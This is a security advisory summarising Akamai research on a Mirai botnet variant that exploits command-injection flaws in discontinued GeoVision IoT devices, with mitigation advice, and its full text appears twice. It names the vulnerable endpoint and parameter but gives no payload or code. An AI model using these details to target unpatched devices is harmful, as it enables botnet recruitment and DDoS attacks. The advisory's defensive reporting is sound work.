Here Comes Mirai: IoT Devices RSVP to Active Exploitation
Summary:
In April 2025, the Akamai Security Intelligence and Response Team (SIRT) identified active exploitation of two critical command injection vulnerabilities, CVE-2024-6047 and CVE-2024-11120, targeting discontinued GeoVision IoT devices. These flaws were first disclosed in June and November 2024, but this marks the first confirmed instance of their active exploitation. The vulnerabilities affect the /DateSetting.cgi endpoint, where attackers inject malicious commands into the szSrvIpAddr parameter. Because these devices do not properly sanitize user input, unauthenticated remote attackers can execute arbitrary system commands. Akamai detected the activity through their global honeypot network and traced the commands to a download and execution of an ARM-based Mirai malware variant named “boatnet,” associated with the LZRD strain. Upon execution, the malware prints a distinctive string to the console and activates numerous Mirai-based attack functions, such as attack_tcp_ack, attack_udp_plain, and attack_method_ovhdrop, which are commonly used to conduct large-scale DDoS attacks.
Security Officer Comments:
Further analysis revealed a hard-coded command-and-control IP address embedded in the malware's code and banner messages on some C2 ports that closely resemble those from a previously identified botnet known as InfectedSlurs, first reported in 2023. Although the original infrastructure tied to InfectedSlurs appears to be inactive, similarities in banner strings suggest that remnants of the campaign may still be operational or have been recycled. In addition to the GeoVision vulnerabilities, the same botnet has been observed exploiting other known vulnerabilities, including flaws in Hadoop YARN, CVE-2018-10561, the ZTE ZXV10 H108L router, and a DigiEver vulnerability that Akamai previously reported.
The attackers used similar command injection tactics to exploit these devices, retrieving malware payloads from the same infrastructure. Indicators of compromise, including payload URLs, C2 IPs, and malicious file names, were published by Akamai to assist organizations in identifying and mitigating infections.
Suggested Corrections:
IOCs:
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet
Users should be wary of IoT devices that lack traditional security features. Many IoT devices do not have multi-factor authentication or even the ability to change default usernames and passwords. Cybercriminals will continue to target the ever-growing IoT device market.
If IoT devices must be used, users should consider segmenting them from sensitive networks.
Once a device has been compromised by a botnet, users may notice slow or sluggish systems and/or unusual traffic on the network.
Link(s):
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet
In April 2025, the Akamai Security Intelligence and Response Team (SIRT) identified active exploitation of two critical command injection vulnerabilities, CVE-2024-6047 and CVE-2024-11120, targeting discontinued GeoVision IoT devices. These flaws were first disclosed in June and November 2024, but this marks the first confirmed instance of their active exploitation. The vulnerabilities affect the /DateSetting.cgi endpoint, where attackers inject malicious commands into the szSrvIpAddr parameter. Because these devices do not properly sanitize user input, unauthenticated remote attackers can execute arbitrary system commands. Akamai detected the activity through their global honeypot network and traced the commands to a download and execution of an ARM-based Mirai malware variant named “boatnet,” associated with the LZRD strain. Upon execution, the malware prints a distinctive string to the console and activates numerous Mirai-based attack functions, such as attack_tcp_ack, attack_udp_plain, and attack_method_ovhdrop, which are commonly used to conduct large-scale DDoS attacks.
Security Officer Comments:
Further analysis revealed a hard-coded command-and-control IP address embedded in the malware's code and banner messages on some C2 ports that closely resemble those from a previously identified botnet known as InfectedSlurs, first reported in 2023. Although the original infrastructure tied to InfectedSlurs appears to be inactive, similarities in banner strings suggest that remnants of the campaign may still be operational or have been recycled. In addition to the GeoVision vulnerabilities, the same botnet has been observed exploiting other known vulnerabilities, including flaws in Hadoop YARN, CVE-2018-10561, the ZTE ZXV10 H108L router, and a DigiEver vulnerability that Akamai previously reported.
The attackers used similar command injection tactics to exploit these devices, retrieving malware payloads from the same infrastructure. Indicators of compromise, including payload URLs, C2 IPs, and malicious file names, were published by Akamai to assist organizations in identifying and mitigating infections.
Suggested Corrections:
IOCs:
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet
Users should be wary of IoT devices that lack traditional security features. Many IoT devices do not have multi-factor authentication or even the ability to change default usernames and passwords. Cybercriminals will continue to target the ever-growing IoT device market.
If IoT devices must be used, users should consider segmenting them from sensitive networks.
Once a device has been compromised by a botnet, users may notice slow or sluggish systems and/or unusual traffic on the network.
Link(s):
https://www.akamai.com/blog/security-research/active-exploitation-mirai-geovision-iot-botnet